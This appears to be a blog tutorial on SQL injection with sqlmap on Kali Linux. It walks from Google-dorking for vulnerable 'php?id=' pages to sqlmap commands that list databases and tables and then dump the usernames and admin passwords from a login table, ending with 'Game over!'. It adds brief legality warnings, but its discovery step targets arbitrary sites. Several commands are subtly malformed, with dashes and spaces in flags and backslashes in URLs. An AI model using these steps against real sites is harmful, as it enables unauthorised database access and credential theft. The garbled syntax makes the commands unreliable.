How to use SQL_Map for SQL injection in KALI Linux Mechine

How to test if a website is vulnerable to SQL injection.  To be legal, use your own website.
Step 1 – Google for php?=id1
Google for php?=id1

add a Single quote… to the end of the URL.
so it reads php?=id1′
If you get an error the website is vulnerable.   Go to step 2.
If this is your own website – shut it down immediately.  You need to secure it before you bring it back online.

******
Step 2 – Kali SQLMAP – get website databases
SQLMAP   – u http:\\website.com/page.php?id=1 –dbs
This will fetch all available databases on the website.  Did you see them listed?

******
Step 3 – Find the LOGIN table
SQLMAP   – u http:\\website.com/page.php?id=1 –D www – tables

Did you see all the TABLES on the website list out?

Look for likely targets… eg Login, username or password table.

If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!

******
Step 4 – Get all the Login Data (from Step 3)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns

This should display columns with items such as Cookie, ID, IP, Password, Username.

******
Step 5 – Get Usernames (& Admin)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
Look for “admin”

*****
Step 6 – Get Passwords (of Admin)
SQLMAP   – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump

That’s it.
Game over!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s